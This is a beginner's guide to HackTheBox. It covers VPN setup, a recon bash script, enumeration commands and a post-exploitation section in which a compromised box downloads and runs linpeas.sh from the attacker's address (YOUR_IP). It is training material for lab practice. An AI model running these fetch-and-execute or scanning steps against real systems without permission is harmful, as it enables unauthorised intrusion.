HackTheBox (HTB) is one of the most popular platforms for hands-on penetration testing practice. With hundreds of machines ranging from beginner to insane difficulty, HTB has become a standard training ground for security professionals preparing for certifications like OSCP, eCPPT, and CRTO. If you’re new to the platform, this guide walks you through everything you need to get started.
Creating Your Account
Visit hackthebox.com and register. The free tier gives you access to:
- Starting Point machines (guided beginner labs)
- The currently active machines (the rotating pool of live boxes); retired machines require VIP
- Community write-ups for retired machines
VIP subscription (~$14/month) unlocks all retired machines, faster VPN servers, and exclusive machines — well worth it once you’re ready to practice consistently.
Setting Up Your Environment
Install Kali Linux or ParrotOS
HackTheBox is best approached from a dedicated pentesting VM:
# Download Kali from kali.org
# Set up VirtualBox or VMware with at least:
# - 4GB RAM (8GB recommended)
# - 50GB storage
# - 2 CPU cores
Connect to HTB VPN
Download your VPN configuration from HTB:
- Profile → Access → Download VPN config
- Choose Starting Point, Machines, or Labs pack
- Connect:
sudo openvpn ~/Downloads/your_config.ovpn
Verify the tunnel came up and note your own lab address; this tun0 IP is what you put in reverse-shell payloads and file-transfer URLs (the YOUR_IP used later in this guide):
ip addr show tun0
Keep the VPN terminal open and work in another terminal.
Starting Point: Your First Machines
HTB’s Starting Point machines are specifically designed for beginners. They’re guided with tasks that teach one skill at a time.
Tier 0 Machines (Absolute Basics)
- Meow — Telnet enumeration
- Fawn — FTP anonymous login
- Dancing — SMB enumeration with smbclient
- Redeemer — Redis unauthenticated access
These teach the fundamental workflow: scan → enumerate → exploit → capture flag.
Tier 1 Machines
- Appointment — SQL injection
- Sequel — MySQL enumeration
- Crocodile — FTP + web login
- Responder — NTLMv2 hash capture with Responder via file inclusion
- Three — S3 bucket misconfiguration
Complete all Starting Point machines before moving to the main box pool.
Core Methodology (The HTB Approach)
Every machine follows a similar workflow:
1. Reconnaissance
# Initial port scan: fast, all TCP ports, saved in normal output format
sudo nmap -sS -p- --min-rate 5000 TARGET_IP -oN nmap_allports.txt
# Service versions and default scripts, only on the ports the first scan reported open
sudo nmap -sV -sC -p 22,80,443 TARGET_IP -oN nmap_services.txt
2. Enumeration
Based on what ports are open:
# HTTP/HTTPS
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
nikto -h http://TARGET_IP
whatweb http://TARGET_IP
# SMB
enum4linux -a TARGET_IP
smbclient -L //TARGET_IP -N
# FTP
ftp TARGET_IP # Try anonymous / anonymous
# SSH
ssh user@TARGET_IP # Note version from nmap for known CVEs
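The reconnaissance and enumeration steps above are usually wired together so the second nmap run only touches ports the first one found open and the follow-up tools are chosen from the identified services rather than guessed. The script below is an added example written for this guide, not HackTheBox's own tooling; it assumes nmap, grep, awk, sort and paste on a Kali or Parrot VM connected to the HTB VPN, uses nmap's grepable output (written by -oA) as the hand-off format between phases, and takes the box address from the HTB machine panel as TARGET_IP.

```bash
#!/usr/bin/env bash
# Two-phase recon for an HTB box: all-port discovery, then version/script scan
# of only the open ports, then a per-service enumeration dispatcher.
# Added example for this guide (not HTB's own tooling). Assumes nmap, grep,
# awk, sort, paste on a Kali/Parrot attack VM connected to the HTB VPN.
set -euo pipefail

# Open TCP ports from nmap grepable output (.gnmap), as "22,80,443".
# A grepable port entry looks like: 22/open/tcp//ssh///
open_ports_from_gnmap() {
  grep -oE '[0-9]+/open/tcp' "$1" | cut -d/ -f1 | sort -nu | paste -sd, -
}

# "port service" pairs from grepable output, e.g. "80 http". nmap writes
# service names such as ssl/http as ssl|http in this format.
services_from_gnmap() {
  grep -oE '[0-9]+/open/tcp//[^/]*' "$1" | awk -F/ '{print $1, $5}'
}

# Phase 1 + phase 2. -n skips DNS (no resolver answers for 10.10.x.x inside
# the lab VPN); -oA writes .nmap/.gnmap/.xml so the parsers above can read it.
scan_box() {
  local target="$1" outdir="${2:-scans}"
  mkdir -p "$outdir"
  sudo nmap -sS -p- -n --min-rate 5000 -oA "$outdir/allports" "$target"
  local ports
  ports=$(open_ports_from_gnmap "$outdir/allports.gnmap" || true)
  [ -n "$ports" ] || { echo "no open TCP ports found on $target" >&2; return 1; }
  sudo nmap -sV -sC -n -p "$ports" -oA "$outdir/services" "$target"
  enumerate_services "$target" "$outdir/services.gnmap"
}

# Print the enumeration commands that match each identified service, so the
# next step follows directly from the scan instead of being guessed at.
enumerate_services() {
  local target="$1" gnmap="$2"
  services_from_gnmap "$gnmap" | while read -r port svc; do
    case "$svc" in
      *http*)
        echo "whatweb http://$target:$port"
        echo "gobuster dir -u http://$target:$port -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt" ;;
      microsoft-ds|netbios-ssn)
        echo "smbclient -L //$target -N"
        echo "enum4linux -a $target" ;;
      ftp)
        echo "ftp $target    # try anonymous / anonymous" ;;
      ssh)
        echo "grep '$port/tcp' ${gnmap%.gnmap}.nmap    # banner version -> searchsploit" ;;
      *)
        echo "# $port/$svc: no default playbook, read the -sC output" ;;
    esac
  done
}

# Usage: ./recon.sh TARGET_IP [outdir]
[ $# -ge 1 ] && scan_box "$@"
```

Save it as recon.sh, run `./recon.sh TARGET_IP`, and the printed commands are your enumeration to-do list for that box. The parsing functions work on any saved .gnmap file, so you can re-run enumerate_services against an old scan without rescanning.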
3. Exploitation
Based on findings, research and exploit:
- Google the exact version of software found for known CVEs
- Check Exploit-DB:
searchsploit apache 2.4.49
- Look for default credentials
- Test web apps for SQLi, XSS, file upload, LFI/RFI
4. Post-Exploitation
# User flag
find / -name user.txt 2>/dev/null
cat /home/*/user.txt
# Privilege escalation: serve linpeas.sh from your attack box first
# (python3 -m http.server 80, run in the directory holding linpeas.sh; YOUR_IP is your tun0 address)
wget http://YOUR_IP/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh
# Root flag
cat /root/root.txt
Recommended Easy Machines (2026)
Start with retired machines (VIP) that have abundant write-ups. Several of these are Windows boxes, so you practise both OS families early:
| Machine | OS | Key Skill |
|---|---|---|
| Lame | Linux | Samba CVE exploitation (CVE-2007-2447 usermap_script) |
| Legacy | Windows | MS08-067 with Metasploit |
| Blue | Windows | EternalBlue (MS17-010) |
| Jerry | Windows | Apache Tomcat default creds |
| Bashed | Linux | phpbash webshell |
| Nibbles | Linux | Nibbleblog file upload RCE |
| Shocker | Linux | Shellshock |
Using Write-ups Ethically
Write-ups exist for all retired machines. The most effective approach:
- Attempt for at least 30-60 minutes before looking at hints
- Use hints from Discord/forums first (HTB has an official Discord)
- Read the write-up after solving to understand what you missed
- Never look at write-ups for active machines — violates HTB terms of service
Essential Resources
- IppSec YouTube — Video walkthroughs of retired HTB machines; the best learning resource on the platform
- HTB Discord — Official server with hints and community support
- HackTricks (book.hacktricks.xyz) — Comprehensive pentesting reference
- GTFOBins — Unix binary privilege escalation
- Exploit-DB — CVE database and PoC exploits
Tracking Progress
The HTB ranking system uses Hack Points and Owns. Getting “first blood” (first to solve a machine) earns extra points. Track your methodology notes — tools like Obsidian or CherryTree work well for organized pentesting notes.
HTB is one of the best hands-on platforms for practical security learning. Commit to solving two machines per week, and within three months you’ll have a solid foundation to begin preparing for the OSCP exam.